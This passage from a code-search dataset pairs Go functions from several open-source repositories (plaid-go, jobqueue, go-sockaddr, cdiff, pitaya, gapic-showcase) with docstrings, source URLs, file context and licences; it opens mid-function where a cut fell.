r += int(b << uint(a*8))
}
}
return r
}
func GetDirectInt(b byte) int {
i, _ := strconv.Atoi(fmt.Sprintf("%d", b))
return i
}
func GetBoolBit(b byte, i uint) bool {
n := byte(1 << i)
return (b & n) == n
}
func GetSize(b []byte, sig uint) int {
s := 0
for _, b := range b {
s = s << sig
s |= int(b)
}
return s
} | Apache License 2.0 |
plaid/plaid-go | plaid/model_transaction_stream_amount.go | HasAmount | go | func (o *TransactionStreamAmount) HasAmount() bool {
if o != nil && o.Amount != nil {
return true
}
return false
} | HasAmount returns a boolean if a field has been set. | https://github.com/plaid/plaid-go/blob/c2a20f380d37eecba36138b04e14f540b59cc22a/plaid/model_transaction_stream_amount.go#L66-L72 | package plaid
import (
"encoding/json"
)
type TransactionStreamAmount struct {
Amount *float32 `json:"amount,omitempty"`
IsoCurrencyCode NullableString `json:"iso_currency_code,omitempty"`
UnofficialCurrencyCode NullableString `json:"unofficial_currency_code,omitempty"`
AdditionalProperties map[string]interface{}
}
type _TransactionStreamAmount TransactionStreamAmount
func NewTransactionStreamAmount() *TransactionStreamAmount {
this := TransactionStreamAmount{}
return &this
}
func NewTransactionStreamAmountWithDefaults() *TransactionStreamAmount {
this := TransactionStreamAmount{}
return &this
}
func (o *TransactionStreamAmount) GetAmount() float32 {
if o == nil || o.Amount == nil {
var ret float32
return ret
}
return *o.Amount
}
func (o *TransactionStreamAmount) GetAmountOk() (*float32, bool) {
if o == nil || o.Amount == nil {
return nil, false
}
return o.Amount, true
} | MIT License |
gallactic/gallactic | rpc/filter.go | GetRangeFilter | go | func GetRangeFilter(op, fName string) (func(a, b uint64) bool, error) {
if op == "==" {
return func(a, b uint64) bool {
return a == b
}, nil
} else if op == "!=" {
return func(a, b uint64) bool {
return a != b
}, nil
} else if op == "<=" {
return func(a, b uint64) bool {
return a <= b
}, nil
} else if op == ">=" {
return func(a, b uint64) bool {
return a >= b
}, nil
} else if op == "<" {
return func(a, b uint64) bool {
return a < b
}, nil
} else if op == ">" {
return func(a, b uint64) bool {
return a > b
}, nil
} else {
return nil, fmt.Errorf("Op: " + op + " is not supported for '" + fName + "' filtering")
}
} | Some standard filtering functions. | https://github.com/gallactic/gallactic/blob/35e1da6e1a539d823279da9d429725e6fba3b332/rpc/filter.go#L92-L120 | package rpc
import (
"fmt"
"math"
"strconv"
"strings"
)
type Filter interface {
Match(v interface{}) bool
}
type ConfigurableFilter interface {
Filter
Configure(*FilterData) error
}
type FilterData struct {
Field string `json:"field"`
Op string `json:"op"`
Value string `json:"value"`
}
type CompositeFilter struct {
filters []Filter
}
func (cf *CompositeFilter) SetData(filters []Filter) {
cf.filters = filters
}
func (cf *CompositeFilter) Match(v interface{}) bool {
for _, f := range cf.filters {
if !f.Match(v) {
return false
}
}
return true
}
type MatchAllFilter struct{}
func (maf *MatchAllFilter) Match(v interface{}) bool { return true }
func ParseNumberValue(value string) (uint64, error) {
var val uint64
if value == "min" {
val = 0
} else if value == "max" {
val = math.MaxUint64
} else {
tv, err := strconv.ParseUint(value, 10, 64)
if err != nil {
return 0, fmt.Errorf("Wrong value type.")
}
val = tv
}
return val, nil
} | MIT License |
olivere/jobqueue | manager.go | schedule | go | func (m *Manager) schedule() {
m.testSchedulerStarted()
defer m.testSchedulerStopped()
t := time.NewTicker(1 * time.Second)
defer t.Stop()
for {
select {
case <-t.C:
for {
job, err := m.st.Next()
if err == ErrNotFound {
break
}
if err != nil {
m.logger.Printf("jobqueue: error picking next job to schedule: %v", err)
break
}
if job == nil {
break
}
m.mu.Lock()
concurrency := m.concurrency[job.Rank]
working := m.working[job.Rank]
m.mu.Unlock()
if working >= concurrency {
break
}
m.mu.Lock()
job.State = Working
job.Started = time.Now().UnixNano()
err = m.st.Update(context.Background(), job)
if err != nil {
m.mu.Unlock()
m.logger.Printf("jobqueue: error updating job: %v", err)
break
}
rank := job.Rank
m.working[rank]++
m.mu.Unlock()
m.testJobScheduled()
m.jobc[rank] <- job
}
case <-m.stopSched:
m.stopSched <- struct{}{}
return
}
}
} | -- Scheduler --
schedule periodically picks up waiting jobs and passes them to idle workers. | https://github.com/olivere/jobqueue/blob/517172f3c5dfbcf4f548a2631ce4c277f2f54060/manager.go#L315-L365 | package jobqueue
import (
"context"
"errors"
"fmt"
"sync"
"time"
"github.com/google/uuid"
)
const (
defaultConcurrency = 5
)
func nop() {}
type Manager struct {
logger Logger
st Store
backoff BackoffFunc
mu sync.Mutex
tm map[string]Processor
concurrency map[int]int
working map[int]int
started bool
workers map[int][]*worker
stopSched chan struct{}
workersWg sync.WaitGroup
jobc map[int]chan *Job
startupBehaviour StartupBehaviour
testManagerStarted func()
testManagerStopped func()
testSchedulerStarted func()
testSchedulerStopped func()
testJobAdded func()
testJobScheduled func()
testJobStarted func()
testJobRetry func()
testJobFailed func()
testJobSucceeded func()
}
func New(options ...ManagerOption) *Manager {
m := &Manager{
logger: stdLogger{},
st: NewInMemoryStore(),
backoff: exponentialBackoff,
tm: make(map[string]Processor),
concurrency: map[int]int{0: defaultConcurrency},
working: map[int]int{0: 0},
startupBehaviour: None,
testManagerStarted: nop,
testManagerStopped: nop,
testSchedulerStarted: nop,
testSchedulerStopped: nop,
testJobAdded: nop,
testJobScheduled: nop,
testJobStarted: nop,
testJobRetry: nop,
testJobFailed: nop,
testJobSucceeded: nop,
}
for _, opt := range options {
opt(m)
}
return m
}
type ManagerOption func(*Manager)
func SetLogger(logger Logger) ManagerOption {
return func(m *Manager) {
m.logger = logger
}
}
func SetStore(store Store) ManagerOption {
return func(m *Manager) {
m.st = store
}
}
func SetBackoffFunc(fn BackoffFunc) ManagerOption {
return func(m *Manager) {
if fn != nil {
m.backoff = fn
} else {
m.backoff = exponentialBackoff
}
}
}
func SetConcurrency(rank, n int) ManagerOption {
return func(m *Manager) {
if n <= 1 {
m.concurrency[rank] = 1
} else {
m.concurrency[rank] = n
}
}
}
type StartupBehaviour int
const (
None StartupBehaviour = iota
MarkAsFailed
)
func SetStartupBehaviour(b StartupBehaviour) ManagerOption {
return func(m *Manager) {
m.startupBehaviour = b
}
}
func (m *Manager) Register(topic string, p Processor) error {
m.mu.Lock()
defer m.mu.Unlock()
if _, found := m.tm[topic]; found {
return fmt.Errorf("jobqueue: topic %s already registered", topic)
}
m.tm[topic] = p
return nil
}
func (m *Manager) Start() error {
m.mu.Lock()
defer m.mu.Unlock()
if m.started {
return errors.New("jobqueue: manager already started")
}
err := m.st.Start(m.startupBehaviour)
if err != nil {
return err
}
m.jobc = make(map[int]chan *Job)
m.workers = make(map[int][]*worker)
for rank, concurrency := range m.concurrency {
m.jobc[rank] = make(chan *Job, concurrency)
m.workers[rank] = make([]*worker, concurrency)
for i := 0; i < m.concurrency[rank]; i++ {
m.workersWg.Add(1)
m.workers[rank][i] = newWorker(m, m.jobc[rank])
}
}
m.stopSched = make(chan struct{})
go m.schedule()
m.started = true
m.testManagerStarted()
return nil
}
func (m *Manager) Stop() error {
return m.Close()
}
func (m *Manager) Close() error {
return m.CloseWithTimeout(-1 * time.Second)
}
func (m *Manager) CloseWithTimeout(timeout time.Duration) error {
m.mu.Lock()
if !m.started {
m.mu.Unlock()
return nil
}
m.mu.Unlock()
m.stopSched <- struct{}{}
<-m.stopSched
close(m.stopSched)
m.mu.Lock()
for rank := range m.jobc {
close(m.jobc[rank])
}
m.mu.Unlock()
if timeout.Nanoseconds() < 0 {
m.workersWg.Wait()
m.testManagerStopped()
return nil
}
complete := make(chan struct{}, 1)
go func() {
m.workersWg.Wait()
close(complete)
}()
var err error
select {
case <-complete:
case <-time.After(timeout):
err = errors.New("jobqueue: close timed out")
}
m.mu.Lock()
m.started = false
m.mu.Unlock()
m.testManagerStopped()
return err
}
func (m *Manager) Add(ctx context.Context, job *Job) error {
if job.Topic == "" {
return errors.New("jobqueue: no topic specified")
}
m.mu.Lock()
defer m.mu.Unlock()
_, found := m.tm[job.Topic]
if !found {
return fmt.Errorf("jobqueue: topic %s not registered", job.Topic)
}
job.ID = uuid.New().String()
job.State = Waiting
job.Retry = 0
job.Priority = -time.Now().UnixNano()
job.Created = time.Now().UnixNano()
err := m.st.Create(ctx, job)
if err != nil {
return err
}
m.testJobAdded()
return nil
}
func (m *Manager) Stats(ctx context.Context, request *StatsRequest) (*Stats, error) {
return m.st.Stats(ctx, request)
}
func (m *Manager) Lookup(ctx context.Context, id string) (*Job, error) {
return m.st.Lookup(ctx, id)
}
func (m *Manager) LookupByCorrelationID(ctx context.Context, correlationID string) ([]*Job, error) {
return m.st.LookupByCorrelationID(ctx, correlationID)
}
func (m *Manager) List(ctx context.Context, request *ListRequest) (*ListResponse, error) {
if request.Limit < 0 {
request.Limit = 0
} else if request.Limit == 0 {
request.Limit = 10
}
return m.st.List(ctx, request)
} | MIT License |
nike-inc/cerberus-go-client | v3/vendor/github.com/hashicorp/go-sockaddr/ipv4addr.go | Equal | go | func (ipv4 IPv4Addr) Equal(sa SockAddr) bool {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return false
}
if ipv4.Port != ipv4b.Port {
return false
}
if ipv4.Address != ipv4b.Address {
return false
}
if ipv4.NetIPNet().String() != ipv4b.NetIPNet().String() {
return false
}
return true
} | Equal returns true if a SockAddr is equal to the receiving IPv4Addr. | https://github.com/nike-inc/cerberus-go-client/blob/7750cd9f0754d44b60c866537fb2030bb7662fe5/v3/vendor/github.com/hashicorp/go-sockaddr/ipv4addr.go#L297-L316 | package sockaddr
import (
"encoding/binary"
"fmt"
"net"
"regexp"
"strconv"
"strings"
)
type (
IPv4Address uint32
IPv4Network uint32
IPv4Mask uint32
)
const IPv4HostMask = IPv4Mask(0xffffffff)
var ipv4AddrAttrMap map[AttrName]func(IPv4Addr) string
var ipv4AddrAttrs []AttrName
var trailingHexNetmaskRE *regexp.Regexp
type IPv4Addr struct {
IPAddr
Address IPv4Address
Mask IPv4Mask
Port IPPort
}
func init() {
ipv4AddrInit()
trailingHexNetmaskRE = regexp.MustCompile(`/([0f]{8})$`)
}
func NewIPv4Addr(ipv4Str string) (IPv4Addr, error) {
trailingHexNetmaskRe := trailingHexNetmaskRE.Copy()
if match := trailingHexNetmaskRe.FindStringIndex(ipv4Str); match != nil {
ipv4Str = ipv4Str[:match[0]]
}
ipAddr, network, err := net.ParseCIDR(ipv4Str)
if err == nil {
ipv4 := ipAddr.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address", ipv4Str)
}
netmaskSepPos := strings.LastIndexByte(ipv4Str, '/')
if netmaskSepPos != -1 && netmaskSepPos+1 < len(ipv4Str) {
netMask, err := strconv.ParseUint(ipv4Str[netmaskSepPos+1:], 10, 8)
if err != nil {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address: unable to parse CIDR netmask: %v", ipv4Str, err)
} else if netMask > 128 {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address: invalid CIDR netmask", ipv4Str)
}
if netMask >= 96 {
network.Mask = net.CIDRMask(int(netMask-96), IPv4len*8)
}
}
ipv4Addr := IPv4Addr{
Address: IPv4Address(binary.BigEndian.Uint32(ipv4)),
Mask: IPv4Mask(binary.BigEndian.Uint32(network.Mask)),
}
return ipv4Addr, nil
}
tcpAddr, err := net.ResolveTCPAddr("tcp4", ipv4Str)
if err == nil {
ipv4 := tcpAddr.IP.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to resolve %+q as an IPv4 address", ipv4Str)
}
ipv4Uint32 := binary.BigEndian.Uint32(ipv4)
ipv4Addr := IPv4Addr{
Address: IPv4Address(ipv4Uint32),
Mask: IPv4HostMask,
Port: IPPort(tcpAddr.Port),
}
return ipv4Addr, nil
}
ip := net.ParseIP(ipv4Str)
if ip != nil {
ipv4 := ip.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to string convert %+q to an IPv4 address", ipv4Str)
}
ipv4Uint32 := binary.BigEndian.Uint32(ipv4)
ipv4Addr := IPv4Addr{
Address: IPv4Address(ipv4Uint32),
Mask: IPv4HostMask,
}
return ipv4Addr, nil
}
return IPv4Addr{}, fmt.Errorf("Unable to parse %+q to an IPv4 address: %v", ipv4Str, err)
}
func (ipv4 IPv4Addr) AddressBinString() string {
return fmt.Sprintf("%032s", strconv.FormatUint(uint64(ipv4.Address), 2))
}
func (ipv4 IPv4Addr) AddressHexString() string {
return fmt.Sprintf("%08s", strconv.FormatUint(uint64(ipv4.Address), 16))
}
func (ipv4 IPv4Addr) Broadcast() IPAddr {
return IPv4Addr{
Address: IPv4Address(ipv4.BroadcastAddress()),
Mask: IPv4HostMask,
}
}
func (ipv4 IPv4Addr) BroadcastAddress() IPv4Network {
return IPv4Network(uint32(ipv4.Address)&uint32(ipv4.Mask) | ^uint32(ipv4.Mask))
}
func (ipv4 IPv4Addr) CmpAddress(sa SockAddr) int {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return sortDeferDecision
}
switch {
case ipv4.Address == ipv4b.Address:
return sortDeferDecision
case ipv4.Address < ipv4b.Address:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) CmpPort(sa SockAddr) int {
var saPort IPPort
switch v := sa.(type) {
case IPv4Addr:
saPort = v.Port
case IPv6Addr:
saPort = v.Port
default:
return sortDeferDecision
}
switch {
case ipv4.Port == saPort:
return sortDeferDecision
case ipv4.Port < saPort:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) CmpRFC(rfcNum uint, sa SockAddr) int {
recvInRFC := IsRFC(rfcNum, ipv4)
ipv4b, ok := sa.(IPv4Addr)
if !ok {
if recvInRFC {
return sortReceiverBeforeArg
} else {
return sortDeferDecision
}
}
argInRFC := IsRFC(rfcNum, ipv4b)
switch {
case (recvInRFC && argInRFC), (!recvInRFC && !argInRFC):
return sortDeferDecision
case recvInRFC && !argInRFC:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) Contains(sa SockAddr) bool {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return false
}
return ipv4.ContainsNetwork(ipv4b)
}
func (ipv4 IPv4Addr) ContainsAddress(x IPv4Address) bool {
return IPv4Address(ipv4.NetworkAddress()) <= x &&
IPv4Address(ipv4.BroadcastAddress()) >= x
}
func (ipv4 IPv4Addr) ContainsNetwork(x IPv4Addr) bool {
return ipv4.NetworkAddress() <= x.NetworkAddress() &&
ipv4.BroadcastAddress() >= x.BroadcastAddress()
}
func (ipv4 IPv4Addr) DialPacketArgs() (network, dialArgs string) {
if ipv4.Mask != IPv4HostMask || ipv4.Port == 0 {
return "udp4", ""
}
return "udp4", fmt.Sprintf("%s:%d", ipv4.NetIP().String(), ipv4.Port)
}
func (ipv4 IPv4Addr) DialStreamArgs() (network, dialArgs string) {
if ipv4.Mask != IPv4HostMask || ipv4.Port == 0 {
return "tcp4", ""
}
return "tcp4", fmt.Sprintf("%s:%d", ipv4.NetIP().String(), ipv4.Port)
} | Apache License 2.0 |
shibukawa/cdiff | diff.go | Diff | go | func Diff(oldText, newText string, diffType DiffType) Result {
if diffType == LineByLine {
return lineDiff(oldText, newText)
}
return wordDiff(oldText, newText)
} | Diff calcs diff of text | https://github.com/shibukawa/cdiff/blob/cdef086f82dad20ecc67d3528d3a90ffedd01f2b/diff.go#L225-L230 | package cdiff
import (
"strings"
"github.com/sergi/go-diff/diffmatchpatch"
)
type blockDiff struct {
Ope Ope
Text string
NewLineNumber int
OldLineNumber int
}
func calcBlockDiff(oldText, newText string) []blockDiff {
dmp := diffmatchpatch.New()
a, b, c := dmp.DiffLinesToChars(oldText, newText)
diffs := dmp.DiffMain(a, b, true)
diffByLines := dmp.DiffCharsToLines(diffs, c)
result := make([]blockDiff, len(diffByLines))
newLineNum := 1
oldLineNum := 1
for i, diff := range diffByLines {
f := blockDiff{
Ope: Ope(diff.Type),
Text: diff.Text,
NewLineNumber: -1,
OldLineNumber: -1,
}
inc := strings.Count(diff.Text, "\n")
switch f.Ope {
case Insert:
f.NewLineNumber = newLineNum
newLineNum += inc
case Delete:
f.OldLineNumber = oldLineNum
oldLineNum += inc
case Keep:
f.NewLineNumber = newLineNum
f.OldLineNumber = oldLineNum
newLineNum += inc
oldLineNum += inc
}
result[i] = f
}
return result
}
type Fragment struct {
Text string
Changed bool
}
type Line struct {
Ope Ope
NewLineNumber int
OldLineNumber int
Fragments []Fragment
}
func (d Line) String() string {
var builder strings.Builder
for _, f := range d.Fragments {
builder.WriteString(f.Text)
}
return builder.String()
}
type Result struct {
Lines []Line
}
func (r Result) String() string {
var builder strings.Builder
for _, l := range r.Lines {
switch l.Ope {
case Insert:
builder.WriteString("+ ")
case Delete:
builder.WriteString("- ")
case Keep:
builder.WriteString(" ")
}
builder.WriteString(l.String())
builder.WriteString("\n")
}
return builder.String()
}
func lineDiff(oldText, newText string) Result {
var result Result
blocks := calcBlockDiff(oldText, newText)
for _, block := range blocks {
lines := strings.Split(block.Text, "\n")
for i, line := range lines[:len(lines)-1] {
lineObj := Line{
Ope: block.Ope,
Fragments: []Fragment{
{
Text: line,
},
},
OldLineNumber: -1,
NewLineNumber: -1,
}
if block.NewLineNumber > 0 {
lineObj.NewLineNumber = block.NewLineNumber + i
}
if block.OldLineNumber > 0 {
lineObj.OldLineNumber = block.OldLineNumber + i
}
result.Lines = append(result.Lines, lineObj)
}
}
return result
}
func splitDiffsByNewLine(diffs []diffmatchpatch.Diff) []diffmatchpatch.Diff {
result := make([]diffmatchpatch.Diff, 0, len(diffs))
for _, diff := range diffs {
texts := strings.Split(diff.Text, "\n")
for i, text := range texts {
if i != len(texts)-1 {
text += "\n"
}
if text != "" {
result = append(result, diffmatchpatch.Diff{
Text: text,
Type: diff.Type,
})
}
}
}
return result
}
func wordDiff(oldText, newText string) Result {
var result Result
blocks := calcBlockDiff(oldText, newText)
dmp := diffmatchpatch.New()
for i := 0; i < len(blocks); i++ {
if i != len(blocks)-1 && blocks[i].Ope == Delete && blocks[i+1].Ope == Insert {
diffs := dmp.DiffMain(blocks[i].Text, blocks[i+1].Text, true)
diffs = splitDiffsByNewLine(diffs)
var fragments []Fragment
oldLineNumber := blocks[i].OldLineNumber
newLineNumber := blocks[i].NewLineNumber
for _, diff := range diffs {
if diff.Type == diffmatchpatch.DiffInsert {
continue
}
hasNewLine := strings.HasSuffix(diff.Text, "\n")
fragments = append(fragments, Fragment{
Changed: diff.Type == diffmatchpatch.DiffDelete,
Text: strings.TrimRight(diff.Text, "\n"),
})
if hasNewLine {
result.Lines = append(result.Lines, Line{
Ope: Delete,
NewLineNumber: -1,
OldLineNumber: oldLineNumber,
Fragments: fragments,
})
fragments = nil
oldLineNumber++
}
}
fragments = nil
oldLineNumber = blocks[i+1].OldLineNumber
newLineNumber = blocks[i+1].NewLineNumber
for _, diff := range diffs {
if diff.Type == diffmatchpatch.DiffDelete {
continue
}
hasNewLine := strings.HasSuffix(diff.Text, "\n")
fragments = append(fragments, Fragment{
Changed: diff.Type == diffmatchpatch.DiffInsert,
Text: strings.TrimRight(diff.Text, "\n"),
})
if hasNewLine {
result.Lines = append(result.Lines, Line{
Ope: Insert,
NewLineNumber: newLineNumber,
OldLineNumber: -1,
Fragments: fragments,
})
fragments = nil
newLineNumber++
}
}
i++
} else {
block := blocks[i]
lines := strings.Split(block.Text, "\n")
for i, line := range lines[:len(lines)-1] {
lineObj := Line{
Ope: block.Ope,
Fragments: []Fragment{
{
Text: line,
Changed: block.Ope != Keep,
},
},
OldLineNumber: -1,
NewLineNumber: -1,
}
if block.NewLineNumber > 0 {
lineObj.NewLineNumber = block.NewLineNumber + i
}
if block.OldLineNumber > 0 {
lineObj.OldLineNumber = block.OldLineNumber + i
}
result.Lines = append(result.Lines, lineObj)
}
}
}
return result
} | Apache License 2.0 |
bytemode/pitaya-notes | session/session.go | GetSessionByUID | go | func GetSessionByUID(uid string) *Session {
if val, ok := sessionsByUID.Load(uid); ok {
return val.(*Session)
}
return nil
} | GetSessionByUID return a session bound to an user id | https://github.com/bytemode/pitaya-notes/blob/8b5ff115bc18acdc7741ec4d737b495616c89042/session/session.go#L136-L142 | package session
import (
"context"
"encoding/json"
"net"
"reflect"
"sync"
"sync/atomic"
"time"
"github.com/golang/protobuf/proto"
nats "github.com/nats-io/nats.go"
"github.com/topfreegames/pitaya/constants"
"github.com/topfreegames/pitaya/logger"
"github.com/topfreegames/pitaya/protos"
)
type NetworkEntity interface {
Push(route string, v interface{}) error
ResponseMID(ctx context.Context, mid uint, v interface{}, isError ...bool) error
Close() error
Kick(ctx context.Context) error
RemoteAddr() net.Addr
SendRequest(ctx context.Context, serverID, route string, v interface{}) (*protos.Response, error)
}
var (
sessionBindCallbacks = make([]func(ctx context.Context, s *Session) error, 0)
afterBindCallbacks = make([]func(ctx context.Context, s *Session) error, 0)
SessionCloseCallbacks = make([]func(s *Session), 0)
sessionsByUID sync.Map
sessionsByID sync.Map
sessionIDSvc = newSessionIDService()
SessionCount int64
)
type HandshakeClientData struct {
Platform string `json:"platform"`
LibVersion string `json:"libVersion"`
BuildNumber string `json:"clientBuildNumber"`
Version string `json:"clientVersion"`
}
type HandshakeData struct {
Sys HandshakeClientData `json:"sys"`
User map[string]interface{} `json:"user,omitempty"`
}
type Session struct {
sync.RWMutex
id int64
uid string
lastTime int64
entity NetworkEntity
data map[string]interface{}
handshakeData *HandshakeData
encodedData []byte
OnCloseCallbacks []func()
IsFrontend bool
frontendID string
frontendSessionID int64
Subscriptions []*nats.Subscription
}
type sessionIDService struct {
sid int64
}
func newSessionIDService() *sessionIDService {
return &sessionIDService{
sid: 0,
}
}
func (c *sessionIDService) sessionID() int64 {
return atomic.AddInt64(&c.sid, 1)
}
func New(entity NetworkEntity, frontend bool, UID ...string) *Session {
s := &Session{
id: sessionIDSvc.sessionID(),
entity: entity,
data: make(map[string]interface{}),
handshakeData: nil,
lastTime: time.Now().Unix(),
OnCloseCallbacks: []func(){},
IsFrontend: frontend,
}
if frontend {
sessionsByID.Store(s.id, s)
atomic.AddInt64(&SessionCount, 1)
}
if len(UID) > 0 {
s.uid = UID[0]
}
return s
} | MIT License |
googleapis/gapic-showcase | client/echo_client.go | GetLocation | go | func (c *EchoClient) GetLocation(ctx context.Context, req *locationpb.GetLocationRequest, opts ...gax.CallOption) (*locationpb.Location, error) {
return c.internalClient.GetLocation(ctx, req, opts...)
} | GetLocation is a utility method from google.cloud.location.Locations. | https://github.com/googleapis/gapic-showcase/blob/e4801bdf730a01e8e3e89889ff6729e479e1229b/client/echo_client.go#L276-L278 | package client
import (
"context"
"math"
"sort"
"time"
"cloud.google.com/go/longrunning"
lroauto "cloud.google.com/go/longrunning/autogen"
genprotopb "github.com/googleapis/gapic-showcase/server/genproto"
gax "github.com/googleapis/gax-go/v2"
"google.golang.org/api/iterator"
"google.golang.org/api/option"
"google.golang.org/api/option/internaloption"
gtransport "google.golang.org/api/transport/grpc"
locationpb "google.golang.org/genproto/googleapis/cloud/location"
iampb "google.golang.org/genproto/googleapis/iam/v1"
longrunningpb "google.golang.org/genproto/googleapis/longrunning"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/metadata"
"google.golang.org/protobuf/proto"
)
var newEchoClientHook clientHook
type EchoCallOptions struct {
Echo []gax.CallOption
Expand []gax.CallOption
Collect []gax.CallOption
Chat []gax.CallOption
PagedExpand []gax.CallOption
PagedExpandLegacy []gax.CallOption
PagedExpandLegacyMapped []gax.CallOption
Wait []gax.CallOption
Block []gax.CallOption
ListLocations []gax.CallOption
GetLocation []gax.CallOption
SetIamPolicy []gax.CallOption
GetIamPolicy []gax.CallOption
TestIamPermissions []gax.CallOption
ListOperations []gax.CallOption
GetOperation []gax.CallOption
DeleteOperation []gax.CallOption
CancelOperation []gax.CallOption
}
func defaultEchoGRPCClientOptions() []option.ClientOption {
return []option.ClientOption{
internaloption.WithDefaultEndpoint("localhost:7469"),
internaloption.WithDefaultMTLSEndpoint("localhost:7469"),
internaloption.WithDefaultAudience("https://localhost/"),
internaloption.WithDefaultScopes(DefaultAuthScopes()...),
internaloption.EnableJwtWithScope(),
option.WithGRPCDialOption(grpc.WithDisableServiceConfig()),
option.WithGRPCDialOption(grpc.WithDefaultCallOptions(
grpc.MaxCallRecvMsgSize(math.MaxInt32))),
}
}
func defaultEchoCallOptions() *EchoCallOptions {
return &EchoCallOptions{
Echo: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
Expand: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
Collect: []gax.CallOption{},
Chat: []gax.CallOption{},
PagedExpand: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
PagedExpandLegacy: []gax.CallOption{},
PagedExpandLegacyMapped: []gax.CallOption{},
Wait: []gax.CallOption{},
Block: []gax.CallOption{},
ListLocations: []gax.CallOption{},
GetLocation: []gax.CallOption{},
SetIamPolicy: []gax.CallOption{},
GetIamPolicy: []gax.CallOption{},
TestIamPermissions: []gax.CallOption{},
ListOperations: []gax.CallOption{},
GetOperation: []gax.CallOption{},
DeleteOperation: []gax.CallOption{},
CancelOperation: []gax.CallOption{},
}
}
type internalEchoClient interface {
Close() error
setGoogleClientInfo(...string)
Connection() *grpc.ClientConn
Echo(context.Context, *genprotopb.EchoRequest, ...gax.CallOption) (*genprotopb.EchoResponse, error)
Expand(context.Context, *genprotopb.ExpandRequest, ...gax.CallOption) (genprotopb.Echo_ExpandClient, error)
Collect(context.Context, ...gax.CallOption) (genprotopb.Echo_CollectClient, error)
Chat(context.Context, ...gax.CallOption) (genprotopb.Echo_ChatClient, error)
PagedExpand(context.Context, *genprotopb.PagedExpandRequest, ...gax.CallOption) *EchoResponseIterator
PagedExpandLegacy(context.Context, *genprotopb.PagedExpandLegacyRequest, ...gax.CallOption) *EchoResponseIterator
PagedExpandLegacyMapped(context.Context, *genprotopb.PagedExpandRequest, ...gax.CallOption) *PagedExpandResponseListPairIterator
Wait(context.Context, *genprotopb.WaitRequest, ...gax.CallOption) (*WaitOperation, error)
WaitOperation(name string) *WaitOperation
Block(context.Context, *genprotopb.BlockRequest, ...gax.CallOption) (*genprotopb.BlockResponse, error)
ListLocations(context.Context, *locationpb.ListLocationsRequest, ...gax.CallOption) *LocationIterator
GetLocation(context.Context, *locationpb.GetLocationRequest, ...gax.CallOption) (*locationpb.Location, error)
SetIamPolicy(context.Context, *iampb.SetIamPolicyRequest, ...gax.CallOption) (*iampb.Policy, error)
GetIamPolicy(context.Context, *iampb.GetIamPolicyRequest, ...gax.CallOption) (*iampb.Policy, error)
TestIamPermissions(context.Context, *iampb.TestIamPermissionsRequest, ...gax.CallOption) (*iampb.TestIamPermissionsResponse, error)
ListOperations(context.Context, *longrunningpb.ListOperationsRequest, ...gax.CallOption) *OperationIterator
GetOperation(context.Context, *longrunningpb.GetOperationRequest, ...gax.CallOption) (*longrunningpb.Operation, error)
DeleteOperation(context.Context, *longrunningpb.DeleteOperationRequest, ...gax.CallOption) error
CancelOperation(context.Context, *longrunningpb.CancelOperationRequest, ...gax.CallOption) error
}
type EchoClient struct {
internalClient internalEchoClient
CallOptions *EchoCallOptions
LROClient *lroauto.OperationsClient
}
func (c *EchoClient) Close() error {
return c.internalClient.Close()
}
func (c *EchoClient) setGoogleClientInfo(keyval ...string) {
c.internalClient.setGoogleClientInfo(keyval...)
}
func (c *EchoClient) Connection() *grpc.ClientConn {
return c.internalClient.Connection()
}
func (c *EchoClient) Echo(ctx context.Context, req *genprotopb.EchoRequest, opts ...gax.CallOption) (*genprotopb.EchoResponse, error) {
return c.internalClient.Echo(ctx, req, opts...)
}
func (c *EchoClient) Expand(ctx context.Context, req *genprotopb.ExpandRequest, opts ...gax.CallOption) (genprotopb.Echo_ExpandClient, error) {
return c.internalClient.Expand(ctx, req, opts...)
}
func (c *EchoClient) Collect(ctx context.Context, opts ...gax.CallOption) (genprotopb.Echo_CollectClient, error) {
return c.internalClient.Collect(ctx, opts...)
}
func (c *EchoClient) Chat(ctx context.Context, opts ...gax.CallOption) (genprotopb.Echo_ChatClient, error) {
return c.internalClient.Chat(ctx, opts...)
}
func (c *EchoClient) PagedExpand(ctx context.Context, req *genprotopb.PagedExpandRequest, opts ...gax.CallOption) *EchoResponseIterator {
return c.internalClient.PagedExpand(ctx, req, opts...)
}
func (c *EchoClient) PagedExpandLegacy(ctx context.Context, req *genprotopb.PagedExpandLegacyRequest, opts ...gax.CallOption) *EchoResponseIterator {
return c.internalClient.PagedExpandLegacy(ctx, req, opts...)
}
func (c *EchoClient) PagedExpandLegacyMapped(ctx context.Context, req *genprotopb.PagedExpandRequest, opts ...gax.CallOption) *PagedExpandResponseListPairIterator {
return c.internalClient.PagedExpandLegacyMapped(ctx, req, opts...)
}
func (c *EchoClient) Wait(ctx context.Context, req *genprotopb.WaitRequest, opts ...gax.CallOption) (*WaitOperation, error) {
return c.internalClient.Wait(ctx, req, opts...)
}
func (c *EchoClient) WaitOperation(name string) *WaitOperation {
return c.internalClient.WaitOperation(name)
}
